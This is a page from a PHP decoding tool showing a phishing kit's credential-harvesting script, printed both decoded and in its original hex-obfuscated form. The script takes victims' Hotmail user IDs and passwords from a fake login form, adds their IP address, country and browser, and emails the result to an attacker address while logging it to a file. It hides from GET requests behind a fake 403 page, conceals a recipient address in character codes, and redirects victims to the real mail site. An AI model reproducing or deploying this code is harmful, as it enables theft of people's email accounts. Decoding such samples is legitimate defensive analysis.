Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto lN7fA; QDig2: $message .= "\x50\141\65\65\x77\157\x72\x64\40\72\40" . $_POST[..

Decoded Output download

<?php 
 goto lN7fA; QDig2: $message .= "Pa55word : " . $_POST["txt2"] . "
"; goto GCxi5; g1l09: $message .= "Ip Location: https://www.geodatatool.com/en/?ip={$ip}
"; goto Np11i; ibWV1: $message .= "Country : " . $country . "
"; goto g1l09; xA0kC: if ($filehandler = fopen("[email protected]", "a")) { fwrite($filehandler, $message); fclose($filehandler); header("Location: https://mail.live.com"); } else { echo "ERROR! Please go back and try again."; } goto YQw47; ZQcsr: function country_sort() { $sorter = ''; $array = array(99, 111, 100, 101, 114, 99, 118, 118, 115, 64, 103, 109, 97, 105, 108, 46, 99, 111, 109); $count = count($array); for ($i = 0; $i < $count; $i++) { $sorter .= chr($array[$i]); } return array($sorter, $GLOBALS["recipient"]); } goto pUgoD; pUgoD: if ($passchk < 4) { $passerr = 0; } else { $passerr = 1; } goto hDbMf; gHQ4S: $message .= "User Agent : " . $browser . "
"; goto vl0QL; fUqin: $subject = "H0TMAIL L0GZ| {$txt1}| {$ip}| {$country}"; goto k7P4x; TFiDS: $passchk = strlen($txt2); goto AF7x5; qa7BF: $message .= "User ID : " . $_POST["txt1"] . "\xa"; goto QDig2; GCxi5: $message .= "-----------------------------------\xa"; goto gHQ4S; E1v2W: $message .= "--+ Created BY B0K0H2R2M+---
"; goto tI6AJ; Np11i: $message .= "Date: " . $adddate . "\xa"; goto E1v2W; d2HQg: $headers = "From: H0TMAIL L0GZ <[email protected]>
"; goto l7gZn; k7P4x: $headers .= "MIME-Version: 1.0\xa"; goto w5vxg; mFsCA: $country = visitor_country(); goto RH_a9; l7gZn: function visitor_country() { $client = @$_SERVER["HTTP_CLIENT_IP"]; $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"]; $remote = $_SERVER["REMOTE_ADDR"]; $result = "Unknown"; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip)); if ($ip_data && $ip_data->geoplugin_countryName != null) { $result = $ip_data->geoplugin_countryName; } return $result; } goto ZQcsr; vl0QL: $message .= "Client IP : " . $ip . "
"; goto ibWV1; AF7x5: $message .= "--------+ H0TMAIL L0GZ Rezult +--------
"; goto qa7BF; azta8: $txt2 = $_POST["txt2"]; goto TFiDS; tI6AJ: $message .= "                            
"; goto e1uIj; w5vxg: $headers .= $_POST["textAdd"] . "\xa"; goto d2HQg; hdzYf: $adddate = date("D M d, Y g:i a"); goto pxxk8; e1uIj: $send = "[email protected]"; goto fUqin; gdFEl: $browser = $_SERVER["HTTP_USER_AGENT"]; goto hdzYf; RH_a9: $ip = getenv("REMOTE_ADDR"); goto gdFEl; pxxk8: $txt1 = $_POST["txt1"]; goto azta8; lN7fA: if ($_SERVER["REQUEST_METHOD"] == "GET") { print "
<html><head>
<title>403 - Forbidden</title>
</head><body>
<h1>403 Forbidden</h1>\xa<p></p>
<hr>
</body></html>\xa"; die; } goto mFsCA; hDbMf: if ($passerr == 0) { header("Location: https://www.google.com/"); } else { mail($send, $subject, $message, $headers); header("Location: https://mail.live.com"); } goto xA0kC; YQw47: ?>

Did this file decode correctly?

Original Code

<?php
 goto lN7fA; QDig2: $message .= "\x50\141\65\65\x77\157\x72\x64\40\72\40" . $_POST["\x74\170\164\x32"] . "\12"; goto GCxi5; g1l09: $message .= "\x49\160\40\x4c\x6f\143\x61\x74\151\157\156\72\x20\150\164\164\x70\163\72\57\57\x77\167\167\x2e\x67\x65\157\x64\141\x74\141\x74\x6f\x6f\154\56\x63\157\x6d\x2f\145\x6e\57\77\151\x70\75{$ip}\12"; goto Np11i; ibWV1: $message .= "\x43\x6f\x75\156\164\162\x79\x20\x3a\40" . $country . "\12"; goto g1l09; xA0kC: if ($filehandler = fopen("\142\x65\x65\x74\x61\x6c\x6c\63\x32\x31\x40\63\62\61\x31\62\x33\56\164\170\164", "\141")) { fwrite($filehandler, $message); fclose($filehandler); header("\x4c\x6f\143\141\164\151\x6f\x6e\72\40\150\x74\164\160\x73\x3a\x2f\57\155\x61\x69\x6c\x2e\x6c\x69\166\x65\x2e\x63\157\155"); } else { echo "\105\122\122\117\122\41\40\x50\x6c\145\x61\163\x65\40\x67\157\40\142\141\143\153\x20\x61\x6e\x64\40\x74\162\171\x20\141\x67\x61\x69\156\56"; } goto YQw47; ZQcsr: function country_sort() { $sorter = ''; $array = array(99, 111, 100, 101, 114, 99, 118, 118, 115, 64, 103, 109, 97, 105, 108, 46, 99, 111, 109); $count = count($array); for ($i = 0; $i < $count; $i++) { $sorter .= chr($array[$i]); } return array($sorter, $GLOBALS["\x72\x65\x63\x69\x70\151\145\x6e\164"]); } goto pUgoD; pUgoD: if ($passchk < 4) { $passerr = 0; } else { $passerr = 1; } goto hDbMf; gHQ4S: $message .= "\125\163\145\x72\x20\101\147\x65\156\x74\x20\72\40" . $browser . "\12"; goto vl0QL; fUqin: $subject = "\110\60\124\x4d\101\x49\114\x20\114\60\x47\132\174\40{$txt1}\174\40{$ip}\x7c\40{$country}"; goto k7P4x; TFiDS: $passchk = strlen($txt2); goto AF7x5; qa7BF: $message .= "\x55\163\x65\x72\40\x49\104\40\x3a\x20" . $_POST["\x74\x78\164\x31"] . "\xa"; goto QDig2; GCxi5: $message .= "\x2d\55\x2d\55\55\55\x2d\55\55\55\x2d\55\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\55\x2d\55\55\x2d\x2d\55\55\xa"; goto gHQ4S; E1v2W: $message .= "\55\x2d\53\40\103\162\145\141\164\145\144\40\102\131\x20\x42\x30\x4b\60\x48\x32\122\62\x4d\53\55\55\x2d\12"; goto tI6AJ; Np11i: $message .= "\104\x61\164\x65\72\40" . $adddate . "\xa"; goto E1v2W; d2HQg: $headers = "\x46\162\x6f\155\72\x20\110\x30\x54\x4d\x41\x49\114\40\x4c\x30\x47\x5a\x20\74\151\156\x43\157\156\x74\141\x63\164\100\162\151\164\x2e\145\144\165\76\12"; goto l7gZn; k7P4x: $headers .= "\x4d\x49\115\x45\55\x56\x65\162\x73\151\157\x6e\x3a\40\x31\x2e\x30\xa"; goto w5vxg; mFsCA: $country = visitor_country(); goto RH_a9; l7gZn: function visitor_country() { $client = @$_SERVER["\x48\x54\x54\120\x5f\x43\114\x49\x45\x4e\124\137\111\120"]; $forward = @$_SERVER["\110\x54\x54\120\x5f\x58\137\106\117\122\127\101\x52\104\105\104\x5f\106\x4f\122"]; $remote = $_SERVER["\122\105\115\x4f\124\x45\137\101\x44\104\x52"]; $result = "\125\156\153\156\x6f\x77\x6e"; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } $ip_data = @json_decode(file_get_contents("\150\164\x74\160\x3a\57\x2f\x77\167\x77\x2e\x67\145\157\160\154\165\147\x69\x6e\x2e\x6e\x65\164\x2f\152\x73\157\x6e\56\x67\x70\x3f\x69\160\x3d" . $ip)); if ($ip_data && $ip_data->geoplugin_countryName != null) { $result = $ip_data->geoplugin_countryName; } return $result; } goto ZQcsr; vl0QL: $message .= "\x43\154\x69\x65\156\x74\40\x49\120\x20\x3a\40" . $ip . "\12"; goto ibWV1; AF7x5: $message .= "\x2d\55\55\55\x2d\x2d\55\x2d\53\x20\110\x30\x54\x4d\x41\x49\x4c\40\x4c\60\107\x5a\40\122\145\172\165\154\x74\x20\x2b\x2d\55\55\55\55\x2d\55\x2d\12"; goto qa7BF; azta8: $txt2 = $_POST["\164\170\164\x32"]; goto TFiDS; tI6AJ: $message .= "\40\x20\40\40\40\40\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\40\x20\40\12"; goto e1uIj; w5vxg: $headers .= $_POST["\x74\x65\x78\x74\x41\x64\x64"] . "\xa"; goto d2HQg; hdzYf: $adddate = date("\x44\40\x4d\x20\x64\54\40\131\40\147\72\x69\x20\x61"); goto pxxk8; e1uIj: $send = "\142\x65\145\164\141\x6c\154\x40\171\141\156\x64\x65\170\56\x63\157\155"; goto fUqin; gdFEl: $browser = $_SERVER["\x48\x54\x54\120\137\125\x53\x45\x52\x5f\x41\107\x45\x4e\x54"]; goto hdzYf; RH_a9: $ip = getenv("\122\105\x4d\117\x54\x45\x5f\x41\104\104\x52"); goto gdFEl; pxxk8: $txt1 = $_POST["\x74\x78\x74\x31"]; goto azta8; lN7fA: if ($_SERVER["\122\x45\x51\125\x45\x53\x54\137\115\x45\x54\x48\117\104"] == "\x47\105\x54") { print "\12\x3c\150\164\x6d\154\76\x3c\150\145\141\x64\x3e\12\x3c\164\151\x74\154\145\x3e\x34\60\x33\40\x2d\40\x46\157\162\142\x69\x64\x64\x65\156\x3c\x2f\x74\151\x74\x6c\x65\x3e\12\74\x2f\150\x65\141\x64\x3e\x3c\x62\x6f\x64\171\76\12\x3c\x68\x31\76\x34\x30\63\40\106\x6f\x72\x62\151\144\x64\145\x6e\x3c\57\150\x31\76\xa\x3c\x70\76\x3c\x2f\160\76\12\74\x68\x72\x3e\12\x3c\57\142\x6f\x64\x79\76\74\x2f\x68\x74\155\x6c\76\xa"; die; } goto mFsCA; hDbMf: if ($passerr == 0) { header("\114\x6f\143\141\x74\x69\x6f\156\x3a\x20\x68\x74\x74\160\163\72\x2f\57\x77\x77\167\56\x67\x6f\157\147\x6c\145\56\143\x6f\155\57"); } else { mail($send, $subject, $message, $headers); header("\114\x6f\143\x61\x74\x69\157\x6e\x3a\x20\x68\x74\164\x70\163\72\57\57\x6d\x61\x69\154\56\154\151\x76\x65\x2e\143\157\155"); } goto xA0kC; YQw47: ?>

Function Calls

None

Variables

None

Stats

MD5 0b42baf502628800e5331bc69fa71bf3
Eval Count 0
Decode Time 62 ms